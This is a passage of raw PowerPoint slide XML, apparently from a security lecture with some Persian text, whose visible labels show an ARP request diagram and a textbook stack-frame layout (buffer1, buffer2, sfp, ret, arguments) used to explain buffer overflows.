              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>10.10.0.2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2362200"/>
            <a:ext cx="3276600" cy="3352800"/>
            <a:chOff x="2112" y="1488"/>
            <a:chExt cx="2064" cy="2112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104465" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1488"/>
              <a:ext cx="2064" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 21"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1488"/>
              <a:ext cx="1585" cy="2112"/>
              <a:chOff x="2208" y="1488"/>
              <a:chExt cx="1585" cy="2112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7" name="Group 22"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1488"/>
                <a:ext cx="768" cy="2112"/>
                <a:chOff x="2112" y="1584"/>
                <a:chExt cx="1056" cy="2064"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="104469" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3168" y="1584"/>
                  <a:ext cx="0" cy="2064"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="38100">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="104470" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipV="1">
                  <a:off x="2112" y="3648"/>
                  <a:ext cx="1056" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="38100">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="104468" name="Text Box 25"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2679" y="2640"/>
                <a:ext cx="1114" cy="372"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:solidFill>
                      <a:srgbClr val="800000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Who has 10.10.0.1</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:solidFill>
                      <a:srgbClr val="800000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>My IP is 10.10.0.2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3494088"/>
            <a:ext cx="2590800" cy="468312"/>
            <a:chOff x="1392" y="2454"/>
            <a:chExt cx="1632" cy="295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223259" name="Rectangle 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1968" y="2454"/>
              <a:ext cx="1056" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>??-??-??-??-??-??</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223260" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2454"/>
              <a:ext cx="576" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>10.10.0.2</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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="3276600"/>
            <a:ext cx="609600" cy="609600"/>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15367" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="3276600"/>
            <a:ext cx="609600" cy="609600"/>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15369" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15370" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="3276600"/>
            <a:ext cx="609600" cy="609600"/>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15371" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="3886200"/>
            <a:ext cx="319088" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="3886200"/>
            <a:ext cx="336550" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15373" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3886200"/>
            <a:ext cx="319088" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="3276600"/>
            <a:ext cx="609600" cy="609600"/>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15376" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15377" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3276600"/>
            <a:ext cx="609600" cy="609600"/>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15378" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="3886200"/>
            <a:ext cx="504825" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15379" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3886200"/>
            <a:ext cx="557213" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15380" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3276600"/>
            <a:ext cx="1219200" cy="609600"/>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15381" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3276600"/>
            <a:ext cx="2438400" cy="609600"/>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15382" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3886200"/>
            <a:ext cx="1081088" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15383" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3886200"/>
            <a:ext cx="1081088" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15384" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2971800"/>
            <a:ext cx="285750" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15385" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2971800"/>
            <a:ext cx="387350" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15386" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7346950" y="3244850"/>
            <a:ext cx="2128838" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15387" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="-695325" y="3362325"/>
            <a:ext cx="2517775" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="114084" y="5206425"/>
